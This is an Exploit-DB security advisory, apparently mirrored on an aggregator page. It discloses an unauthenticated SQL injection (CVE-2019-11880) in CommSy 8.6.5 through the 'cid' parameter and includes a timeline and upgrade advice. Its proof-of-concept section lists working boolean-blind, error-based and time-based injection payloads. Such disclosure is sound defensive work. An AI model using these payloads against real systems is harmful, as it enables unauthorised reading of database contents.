CommSy 8.6.5 – SQL injection

• Exploit Database
• 120 阅读

• 作者： Jens Regel
  日期： 2019-05-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46849/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57

  Title: ====== CommSy 8.6.5 - SQL injection   Researcher: =========== Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG   CVE-ID: ======= CVE-2019-11880   Timeline: ========= 2019-04-15 Vulnerability discovered 2019-04-15 Asked for security contact and PGP key 2019-04-16 Send details to the vendor 2019-05-07 Flaw was approved but will not be fixed in branch 8.6 2019-05-15 Public disclosure   Affected Products: ================== CommSy <= 8.6.5   Vendor Homepage: ================ <blockquote class="wp-embedded-content" data-secret="pEFTytC9WT"><a href="https://www.commsy.net/" target="_blank"rel="external nofollow" class="external" >Startseite</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="„Startseite“ — Commsy" src="https://www.commsy.net/embed/#?secret=kT9c6yaQ7s#?secret=pEFTytC9WT" data-secret="pEFTytC9WT" frameborder="0" marginmarginscrolling="no"></iframe>   Details: ======== CommSy is a web-based community system, originally developed at the University of Hamburg, Germany, to support learning/working communities. We have discovered a unauthenticated SQL injection vulnerability in CommSy <= 8.6.5 that makes it possible to read all database content. The vulnerability exists in the HTTP GET parameter "cid".   Proof of Concept: ================= boolean-based blind: commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823 ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login   error-based: commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT COUNT(*),CONCAT(0x716a767871,(SELECT (ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login   time-based blind: commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login   Fix: ==== According to the manufacturer, the version branch 8.6 is no longer supported and the vulnerability will not be fixed. Customers should update to the newest version 9.2.